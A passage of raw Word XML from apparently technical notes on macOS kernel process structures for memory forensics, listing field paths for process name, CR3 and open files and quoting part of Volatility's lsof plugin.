        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D10DC4">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>task.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next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F720D" w:rsidRPr="002F720D" w:rsidRDefault="002F720D" w:rsidP="002F720D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc445313243"/>
      <w:r w:rsidRPr="002F720D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Process name</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w:rsidR="002448FE" w:rsidRPr="002F720D" w:rsidRDefault="002F720D" w:rsidP="002F720D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="425" w:firstLineChars="150" w:firstLine="300"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>proc.</w:t>
      </w:r>
      <w:r w:rsidRPr="002F720D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p_comm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA2766" w:rsidRPr="00F64136" w:rsidRDefault="00052155" w:rsidP="00F64136">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc445313244"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CR3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w:rsidR="00FA2766" w:rsidRPr="00FA2766" w:rsidRDefault="00FA2766" w:rsidP="00FA2766">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA2766">
        <w:t xml:space="preserve">The CR3 value for each process is stored in: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F7195" w:rsidRDefault="00FA2766" w:rsidP="00AD72D9">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA2766">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00655847">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>proc</w:t>
      </w:r>
      <w:r w:rsidR="00655847" w:rsidRPr="00FA2766">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2766">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>task.map.pmap.pm_cr3</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2766">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2766">
        <w:cr/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C3756" w:rsidRDefault="003F5EBF" w:rsidP="000C3756">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc445313245"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Opened files</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w:rsidR="000C3756" w:rsidRPr="000C3756" w:rsidRDefault="000C3756" w:rsidP="000C3756">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>proc.p_fd</w:t>
      </w:r>
      <w:r w:rsidR="00AA6190">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.fd_ofiles</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C3756" w:rsidRPr="000C3756" w:rsidRDefault="000C3756" w:rsidP="000C3756">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\volatility-master\volatility\plugins\mac\lsof.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C3756" w:rsidRPr="000C3756" w:rsidRDefault="000C3756" w:rsidP="000C3756">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> lsof</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>self</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    num_fds </w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> self</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p_fd</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fd_lastfile</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nfiles  </w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> self</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p_fd</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fd_nfiles</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> nfiles </w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> num_fds</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num_fds </w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> nfiles</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C3756" w:rsidRPr="000C3756" w:rsidRDefault="000C3756" w:rsidP="000C3756">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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fds </w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> obj</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="800080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'Array'</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> offset </w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> self</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p_fd</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA6190">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fd_ofiles</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> vm </w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> self</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>obj_vm</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> targetType </w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="800080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'Pointer'</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> count </w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> num_fds</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for</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> fd </w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> enumerate</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fds</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f </w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> fd</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dereference_as</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"fileproc"</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> f</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ftype </w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> f</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f_fglob.fg_type</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ftype </w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="800080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5EBF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DTYPE_VNODE</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="800080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C3756">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
